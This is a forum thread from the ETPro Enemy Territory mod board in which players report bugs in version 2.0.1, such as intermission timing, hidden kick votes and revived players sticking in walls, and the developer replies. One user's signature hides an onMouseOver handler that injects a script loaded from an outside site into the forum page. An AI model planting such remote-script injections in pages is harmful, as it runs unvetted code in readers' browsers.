known bugs in etpro 2.0.1

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

bani
Site Admin

known bugs in etpro 2.0.1

Post by bani »

• limbo menu may not always show out of stock weapons correctly
Last edited by bani on Sun Oct 05, 2003 1:24 am, edited 8 times in total.
slyoldfox

b_intermissiontime lil buggy?

Post by slyoldfox »

Just installed a clean copy of ETPro 2.0.0. Used same config as 1.* and there seems to be a problem with the intermissiontime. Although I have it set to 60 explicitly it just waits 2 secs after completing a map and jumps to the next map.

This server is in a 10 map campaign mode, serverinfo:
venture.fragland.net:27960

If you want me to send the .cfg files, just let me know
Rain

Re: b_intermissiontime lil buggy?

Post by Rain »

slyoldfox wrote:Just installed a clean copy of ETPro 2.0.0. Used same config as 1.* and there seems to be a problem with the intermissiontime. Although I have it set to 60 explicitly it just waits 2 secs after completing a map and jumps to the next map.
ETPro 2.0.0 will obey match_readypercent for the amount of people that need to be ready in intermission... This is probably why intermission is ending so quickly.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
slyoldfox

Post by slyoldfox »

Indeed can't believe I didn't see that!

Thanks for the tip .. meanwhile venture.fragland.net:27960 has been updated to 2.0.1 .. if someone was looking for that :)

Tnx
HarryHirsch

Post by HarryHirsch »

bug?

sometimes(always) kick votes are not displayed (at least when i am referee)
it just say "xxx has called a vote"

mute votes are displayed

Harry
Lekdevil.NL

Post by Lekdevil.NL »

A kick vote is only shown to the team of the player that issued it (ET 1.02 feature). I do think that the vote should also be shown to refs so that they can either force the vote or cancel it.
HarryHirsch

Post by HarryHirsch »

ahh yes i forgot.

but referees should see it too YES

Harry

UPDATE

today (since 2.0.1 maybe) i got 3 times "stuck" in walls ( i hope stuck is the right word) i got wounded by airstrike or granade..lay near a wall ( 1 time high on a wall near north gun on oasis) a medic healed me and i coulnt move away from that wall/place

happened all on 2 different 2.0.1 using servers
TizonOchai

Post by TizonOchai »

We're getting this on a server we just upgraded to 2.0.1 . Happens whenever a player's body is pushed into a wall by an explosion (panzer, a/s) then revived by a medic.

I'm guessing this has to do with the hitbox changes made to injured bodies. When the player is revived, their normal state player's hitbox doesn't clear the wall and they get "stuck."
bani
Site Admin

Post by bani »

they stick for a few seconds, then eventually get pushed out of the wall

its been fixed though, and will go in next release once its been tested.
Badhabit

Post by Badhabit »

bani wrote:they stick for a few seconds, then eventually get pushed out of the wall

its been fixed though, and will go in next release once its been tested.
Yes most of the time it is only for a few seconds, but I did get pushed into the wall on oasis and had to /kill to get out of it. {Zer0]Redneck has a demo of it if you need it.
{Zer0}'s House of Torment 67.19.67.118:27960
{Zer0}'s RTCW server 67.19.67.119:27960
Now Lets Go Kick Some ASS
And thats an Order.
[RDH]KillemAll

Post by [RDH]KillemAll »

I know one of the recent fixes is for servers with sv_maxclients < 20. I am renting a 16 client server. With the new fix the server does not crash but it does change sv_maxclients to 20. Since I am renting a 16 player server this goes against my Acceptable Usage Policy.

I would not have a problem if I could change it back after matches but when I change sv_maxclients to 16 and restart (which is required) it stays at 20. My server.cfg still has it listed at 16. I had the admin that I rent from change it back to 16 once, and again it changed sv_maxclients to 20 once I excecuted the /callvote twl.

Hope you can help. As always, thank you.
Spark2

Post by Spark2 »

That "sticking in the wall" happened a lot of times during our todays match and most of the time it was permanently. That's definitely a critical bug. :/
Another critical bug: When loading the ESL settings, it sets b_xpstopwatch to 1. Of course we only noticed this, when it was too late. :( Actually, I'm confused why this cvar is even there, does it have any point? Why would any competitive gamer or league want to make the stopwatch mode unbalanced (which is the whole point of it).
Ulan

Post by Ulan »

The wallbug is critical yes, a lot more critical thean the puase-bug in 2.0.0.
In clanbase mode, g_antilag 1 is not set automatically, b_shove should aslo be 0.
Bedrock

Post by Bedrock »

i think you should leave b_shove at 80 for matches (unless league states otherwise) because it still does help for clanmates getting in the way. as long as the vertical shove is off it should be fine.
bani
Site Admin

Post by bani »

Ulan wrote:In clanbase mode, g_antilag 1 is not set automatically
thats something you will have to discuss with clanbase. they requested the config have it set to 0, though i disagreed with them.